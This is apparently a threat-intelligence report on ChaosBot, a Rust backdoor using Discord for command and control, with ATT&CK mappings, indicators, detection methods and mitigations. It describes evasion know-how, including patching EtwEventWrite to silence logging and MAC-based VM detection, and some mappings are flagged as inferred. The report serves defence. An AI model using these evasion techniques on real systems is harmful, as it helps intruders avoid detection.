Full Report
Cybersecurity researchers have disclosed details of a new Rust-based backdoor called ChaosBot that can allow operators to conduct reconnaissance and execute arbitrary commands on compromised hosts. "Threat actors leveraged compromised credentials that mapped to both Cisco VPN and an over-privileged Active Directory account named, 'serviceaccount,'" eSentire said in a technical report published
Analysis Summary
# Tool/Technique: ChaosBot
## Overview
ChaosBot is a newly identified, Rust-based backdoor malware capable of allowing threat actors to conduct system reconnaissance and execute arbitrary commands on compromised hosts. It is notable for using Discord channels for command and control (C2) communication.
## Technical Details
- Type: Malware family (Backdoor)
- Platform: Windows
- Capabilities: Remote command execution, system reconnaissance, C2 communication via Discord, reverse tunneling (using FRP).
- First Seen: Late September 2025 (detected by eSentire)
## MITRE ATT&CK Mapping
*Note: Mappings are based on described behavior and are inferred as the article does not explicitly list TIDs.*
- **TA0011 - Command and Control**
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (Implied for Discord/HTTP traffic)
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information (Implied by LNK/PowerShell execution)
- T1036 - Masquerading (Sideloading DLL into legitimate binary)
- T1055 - Process Injection (Implied by DLL Sideloading)
- **TA0003 - Persistence**
- T1547.001 - Registry Run Keys / Startup Folder (Not explicitly mentioned, but common for backdoors)
- T1573.002 - Symmetric Cryptography (Implied for C2 communication security)
- **TA0007 - Discovery**
- T1082 - System Information Discovery (Stated via 'reconnaissance')
## Functionality
### Core Capabilities
- Utilizes a malicious DLL (`msedge_elf.dll`) that is sideloaded by the legitimate Microsoft Edge binary (`identity_helper.exe`).
- Establishes C2 communication exclusively through a dedicated Discord channel managed by the actor ("chaos_00019").
- Supports command execution via PowerShell (`shell`).
- File system interaction: downloading files (`download`) and uploading files (`upload`) to the C2 Discord channel.
- System monitoring via screenshot capture (`scr`).
### Advanced Features
- **Evasion Techniques:**
1. **ETW Evasion:** Patches the first few instructions of `ntdll!EtwEventWrite` (changing them to `xor eax, eax -> ret`) to bypass Event Tracing for Windows (ETW) logging.
2. **Virtual Machine Detection:** Checks system MAC addresses against known prefixes for VMware and VirtualBox, terminating execution if a match is found.
- **Network Persistence:** Downloads and deploys a Fast Reverse Proxy (FRP) tool to establish a reverse proxy connection into the victim's network, ensuring persistent access.
- **Alternative Backdoor attempt:** Unsuccessfully attempted to configure a Visual Studio Code Tunnel service for additional command execution access.
## Indicators of Compromise
- File Hashes: [Not provided in the source text]
- File Names: `msedge_elf.dll` (payload DLL), `identity_helper.exe` (loader binary)
- Registry Keys: [Not provided in the source text]
- Network Indicators: C2 communication occurs over Discord channels associated with user accounts like `chaos_00019` and `lovebb0024`.
- Behavioral Indicators:
- Execution chain starting from a malicious LNK file executing a PowerShell command.
- Use of WMI for initial remote command execution by threat actors.
- Process observed running `identity_helper.exe` loading `msedge_elf.dll`.
- Deployment of FRP (Fast Reverse Proxy) software.
## Associated Threat Actors
- Unnamed threat actor using the online monikers "**chaos_00019**" and "**lovebb0024**".
- Initial access involved leveraging credentials for Cisco VPN and an over-privileged Active Directory account (`serviceaccount`).
## Detection Methods
- Signature-based detection: Signatures for the specific payload hash or FRP binaries used.
- Behavioral detection: Monitoring for:
- PowerShell launching to download and execute code following LNK file execution.
- Anomalous network traffic/API calls related to the `msedge_elf.dll` module.
- Attempts to patch kernel API functions like `ntdll!EtwEventWrite`.
- MAC address checks against known VM ranges immediately preceding process termination.
- YARA rules: Could be developed based on Rust compiler signatures or specific strings/opcodes related to the hardcoded Discord interaction logic.
## Mitigation Strategies
- **Prevention:**
- Enforcement of Multi-Factor Authentication (MFA) on privileged accounts and VPNs to prevent lateral movement following initial credential compromise.
- Strict execution policies to control the running of code initiated via LNK files or PowerShell from untrusted sources.
- **Hardening recommendations:**
- Implement strong host-based security monitoring focused on API hooking/patching detection (e.g., ETW bypasses).
- Deploy endpoint detection and response (EDR) solutions capable of monitoring DLL sideloading behavior, especially involving core system binaries like Edge components.
- Network monitoring for outbound connections to unknown or suspicious Discord endpoints if applicable, though this is complex due to legitimate Discord traffic.
## Related Tools/Techniques
- **Chaos Ransomware (Chaos-C++):** A related, but distinct, threat family mentioned in the context, noted for developing destructive (file deletion) and clipboard hijacking features, indicating potential evolution or shared threat group interest in the "Chaos" branding.
- **Fast Reverse Proxy (FRP):** Used as a standard legitimate utility weaponized for establishing persistence and internal network access.
- **WMI:** Used by predecessor actors to gain initial remote execution capability across the network post-credential compromise.